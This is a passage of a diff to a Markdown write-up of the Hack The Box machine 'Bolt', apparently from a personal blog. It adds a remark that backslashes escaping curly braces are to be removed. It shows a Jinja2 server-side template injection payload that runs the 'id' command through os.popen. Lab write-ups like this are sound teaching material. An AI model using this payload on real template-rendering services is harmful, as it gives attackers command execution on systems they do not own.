jsom1/jsom1.github.io/_walkthroughs/Bolt.md

 ![ssti]({{https://jsom1.github.io/}}/_images/htb_bolt_ssti.png)
 </div>

 It works!
-There are many other commands we could try, for example we could execute the id command with the following syntax:
+There are many other commands we could try, for example we could execute the id command with the following syntax (attention: the backslashes are to be removed!
+I couldn't figure how to escape the curly braces correctly):

 ````
 \{\{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() \}\}